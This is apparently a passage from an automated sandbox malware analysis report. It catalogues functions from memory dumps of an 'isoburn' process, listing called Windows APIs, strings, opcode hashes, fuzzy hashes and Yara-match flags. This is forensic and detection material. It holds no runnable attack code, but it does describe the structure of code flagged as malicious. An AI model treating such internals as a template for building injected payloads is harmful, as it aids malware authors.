                                                                            • API ID: AttributesFile
                                                                            • String ID: @
                                                                            • API String ID: 3188754299-2766056989
                                                                            • Opcode ID: 7bcecd1175c33e4f32012e69309a147baab56ab4c9266a172cc322f1fb6b83cf
                                                                            • Instruction ID: ddc63a5310a179f7d893d699b8694053bb88e7f684b4d980f7dbc70a37a54aad
                                                                            • Opcode Fuzzy Hash: 7bcecd1175c33e4f32012e69309a147baab56ab4c9266a172cc322f1fb6b83cf
                                                                            • Instruction Fuzzy Hash: 9271A1B6800318ABDB24DB64CCC4FEBB3BCBF94700F044599F5199B141EBB0AB948B61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0301E50B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0301E527
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 2538663250-2016760708
                                                                            • Opcode ID: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                            • Instruction ID: fbeb342d4da06c9e5ea24bb9ca06bd90a13d4bcf2dc9903dc76cab9d8064b79b
                                                                            • Opcode Fuzzy Hash: 635382d79cff416b9f17ad0bee3dc5975c074b70bb05a18bbdc40a4beb068f7f
                                                                            • Instruction Fuzzy Hash: EE312DB5A0020AAFDB00DFD8C8809EFB7B9FF88304B148559E905AB214D775EE05CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0301E510 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0301E527
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 2538663250-2016760708
                                                                            • Opcode ID: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                            • Instruction ID: 7e2ca47e56991e4fe55ebc388a3d242f54600744223931274f977e6483197961
                                                                            • Opcode Fuzzy Hash: 783327409d9f152e3c77285bf7fa042f4a25fd5df9a05f961e22058e959633af
                                                                            • Instruction Fuzzy Hash: 81312DB5A0020AAFDB00DFD8C8809EEB7B9BF88304B108559E905AB214D775EE05CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0302551A Relevance: 1.6, APIs: 1, Instructions: 59processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(03010DD1,03010DF9,03010BD1,00000000,030175B3,00000010,03010DF9,?,?,00000044,03010DF9,00000010,030175B3,00000000,03010BD1,03010DF9), ref: 03025583
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                            • Instruction ID: 9da61c62a4f43180cfd38e4431cdf5b7e70375ed3a99c6d2abac6c8577d4ec98
                                                                            • Opcode Fuzzy Hash: c70c70ad0f92251847618d5563fdc75050762b3f3595e7b2f0a82a7b4b7f3631
                                                                            • Instruction Fuzzy Hash: 771109B6205258BBDB04EE99DC81EDB77ADEFCC710F448109FA08D7242D630F9118BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03014120 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03014192
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction ID: 3d1f3f943366360b0970999dcb7871fe7dea2be4206d5cbc150815fa71aab69b
                                                                            • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction Fuzzy Hash: 2D015EB9E0120DABDB10DBA5DC45FDEB7B89B54308F048194E9089B240F671E7588B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025520 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessInternalW.KERNELBASE(03010DD1,03010DF9,03010BD1,00000000,030175B3,00000010,03010DF9,?,?,00000044,03010DF9,00000010,030175B3,00000000,03010BD1,03010DF9), ref: 03025583
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInternalProcess
                                                                            • String ID:
                                                                            • API String ID: 2186235152-0
                                                                            • Opcode ID: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                            • Instruction ID: 1c1be609ed33a8da9d751ac6e37f390227108340bda7fd9620d87a40dcc1a733
                                                                            • Opcode Fuzzy Hash: dc30fb65775e73fbda3954eec95ed66d1a2db8f0e204a2e990e2ae94dc159d13
                                                                            • Instruction Fuzzy Hash: 5301C0B6201248BBDB44DE89DC80EDB77ADAF8C710F408208BA09E7241D630F8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03009960 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030099A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                            • Instruction ID: b6b9f3f8c1610a0755427f5463beaed23e2a358256181913040ac5b6fa34cdab
                                                                            • Opcode Fuzzy Hash: 8fe21a8186d8c0b22be6d23cc714eb24f848aee8ffd292f2038c5389aab0e4df
                                                                            • Instruction Fuzzy Hash: FFF0657738231436E770A1A9AC02FD7B78C9BC0775F180026F60CDB1C0D995B84143E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0300995B Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030099A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                            • Instruction ID: 70950d4648dc608b67694611b05c38d2194db7d9e5dc88bc448497c49f89b2e8
                                                                            • Opcode Fuzzy Hash: e6af1948fe2b60ec5aad23a07142ef98248ca4a55cf9dfa79fd31cca4be9ade6
                                                                            • Instruction Fuzzy Hash: CBF0657B2453143AE270E1599C42FEBB75C9BC0764F244019F608AF1C0DA96784543E5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025440 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(03011F66,?,030237E3,03011F66,03023557,030237E3,?,03011F66,03023557,00001000,?,?,03026CA0), ref: 0302547C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction ID: c07a4b96451bcadbcd8fbbe65ab839a03ae0d4ecb0e3a2e2b30d88a0b92e3fd0
                                                                            • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                            • Instruction Fuzzy Hash: 3FE06DB5205304BBD614EE58DC41EEB77ACEFC4710F404409F948A7241C671B9108BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03025490 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,23C78BFC,00000007,00000000,00000004,00000000,03013913,000000F0,?,?,?,?,00000000), ref: 030254CF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction ID: db9d969c88d2a32303d8709a342472c662490ac953d25b5c24c9271c3365bab1
                                                                            • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                            • Instruction Fuzzy Hash: 29E09A762013487FD614EE99DC40FDB37ACEFC8710F408408F908AB241C671B8108BB4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030175F0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0301761C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                            • Instruction ID: d11456fe4f690bb717bd9171a259dce70e45c9e5e4f1cba80e245970cc3d7bdb
                                                                            • Opcode Fuzzy Hash: 197c5d411eb6a8b592f346f29c51d7b6835527769e77055f605e3160b1caffff
                                                                            • Instruction Fuzzy Hash: B8E0807955130417E7A4D56CDC49FA6339C474CB24F1C4670F95CDF1D2D975F5118250
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 030173F7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03011A2A,030121A9,03023557,00000000), ref: 03017433
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                            • Instruction ID: 86f3ee4d4b61f56522471795442b90bfa452e838447a8c1e5a611542a77930c3
                                                                            • Opcode Fuzzy Hash: 26a8537f8ec240dea86e513593c943ab9d97c757713fe3b37d291765e484f7b7
                                                                            • Instruction Fuzzy Hash: FEE026356803003FE790DAF88C05FEA26CCAB903A8F088625F55CDA2D1E611A4144210
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03017400 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,03011A2A,030121A9,03023557,00000000), ref: 03017433
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                            • Instruction ID: a1745af7c55fcd50765ee2e686b50132173658fafe83b47c736d401b1b50fb75
                                                                            • Opcode Fuzzy Hash: d2a2b4edda2da953367c3c24d5c5aebed2b3062394d9fb6d9458327b5a9b220c
                                                                            • Instruction Fuzzy Hash: D1D05E792453053BF690EAF48C46F96368C9B407A8F088064F94CDB6C1E955F06042A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3db82a5c7851b6ccb9831fc13c26c01f25b6bea3fc7050edf70f63433234d392
                                                                            • Instruction ID: 61e77646714b9a1c40e095115dc0efd642161bb085a1ad2a917bd428129970c8
                                                                            • Opcode Fuzzy Hash: 3db82a5c7851b6ccb9831fc13c26c01f25b6bea3fc7050edf70f63433234d392
                                                                            • Instruction Fuzzy Hash: 30B09B729025C5C9EE51E7609608B1F7955BBD1701F65C061D3030681F4738C1E1E275
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 0300E2BF Relevance: .0, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_3000000_isoburn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                            • Instruction ID: a7eda380ecf1ce68d0ec0abfd53f4c729532db83709ef95b5d1ebd720ed15e82
                                                                            • Opcode Fuzzy Hash: a0ebee8b487f9b084570e16a6c39ca6229a609df2ac72fc373ae30b58edfc77c
                                                                            • Instruction Fuzzy Hash: 51B0922BE5608812CA208C5E78422F4FB64D3C7631E4472FBEC4CA7202A187D66A55D9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 9857c14d32d74c36f74e2529a37acb7e851f15a72416d1d5a7cd230bf6203674
                                                                            • Instruction ID: ea7bbadb47f3413a801fb371bd15cf7962ee89f938aa7eba843c7cbf8fdcfa1b
                                                                            • Opcode Fuzzy Hash: 9857c14d32d74c36f74e2529a37acb7e851f15a72416d1d5a7cd230bf6203674
                                                                            • Instruction Fuzzy Hash: D951C5BAA04117BFCB64DB98AD9097EFBBDBB08200B648169E465D7641D374DE408BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05152410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 4e9d182d78ff45163d85762afab86cdd25803db48f0c17c10c4840f788bd604a
                                                                            • Instruction ID: 5d738117726de37e571db09d426ffd7d9d3af7387299e7a680a15d7f9938fe8d
                                                                            • Opcode Fuzzy Hash: 4e9d182d78ff45163d85762afab86cdd25803db48f0c17c10c4840f788bd604a
                                                                            • Instruction Fuzzy Hash: 3251F67AA04645EECB34DF5CC8909BFB7FAAB44210B148859E9B6C7641D7B4DE00C760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05114725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051146FC
                                                                            • ExecuteOptions, xrefs: 051146A0
                                                                            • Execute=1, xrefs: 05114713
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05114655
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05114742
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05114787
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 8cdcbc555f9cbedede07ad0d9d72154a79c127267ebc79f0d64a2828c399231e
                                                                            • Instruction ID: 64f33e4b4e2b508e565215b4ad692737b378655549d22cfcca632ea328754ae9
                                                                            • Opcode Fuzzy Hash: 8cdcbc555f9cbedede07ad0d9d72154a79c127267ebc79f0d64a2828c399231e
                                                                            • Instruction Fuzzy Hash: 7151E3316003197ADF11EAA4FC89FFDB7A9FF18700F1404A9E505AB191EB719A41CE64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 86825ddecfc786559abaa11584efb69a22b6491614e39db4d180916569ea1385
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: 3681B270E092499EDF68CE68E951BFEBBF2BF46310F38415AD892A7790C7349841CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 051520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 091943a8de180688032083e8f314b8d18945759e5b5656384bf9a7b7f23df778
                                                                            • Instruction ID: 3e8c2b3ab67d290b900d6a1ab3b9c138101c2a832cd3c4e698554132be5c5ada
                                                                            • Opcode Fuzzy Hash: 091943a8de180688032083e8f314b8d18945759e5b5656384bf9a7b7f23df778
                                                                            • Instruction Fuzzy Hash: B921517BA00119ABDB14DE69DC94AFFBBE9AF54650F080116ED25E3200EB309A019BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051102E7
                                                                            • RTL: Re-Waiting, xrefs: 0511031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051102BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: c2bf5f25cef922bd3d368b5ee8d7f2a37527c56c750d5e585c53c959238b8ea1
                                                                            • Instruction ID: 9bc506470cbf259d462787048854b0843fcfa980356262b63880b5aba0b49954
                                                                            • Opcode Fuzzy Hash: c2bf5f25cef922bd3d368b5ee8d7f2a37527c56c750d5e585c53c959238b8ea1
                                                                            • Instruction Fuzzy Hash: 0AE1C2306087429FD725CF28D988B6EBBE2BF49314F140AADF5958B2D1D774E984CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050DBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05117B7F
                                                                            • RTL: Re-Waiting, xrefs: 05117BAC
                                                                            • RTL: Resource at %p, xrefs: 05117B8E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 0-871070163
                                                                            • Opcode ID: c90d0d347b0909ec95c690f1db6e7d2c2a5542c13bc210317024a9292ecdf882
                                                                            • Instruction ID: 8d415bd639bc7bd10573b7e156149ae748f37fd303738b91d7a9806914c7717b
                                                                            • Opcode Fuzzy Hash: c90d0d347b0909ec95c690f1db6e7d2c2a5542c13bc210317024a9292ecdf882
                                                                            • Instruction Fuzzy Hash: 7D41BF317047029BCB20DE25E941B6EF7E6FF88710F110A2DE9969B681DB31E4058FA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050DB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
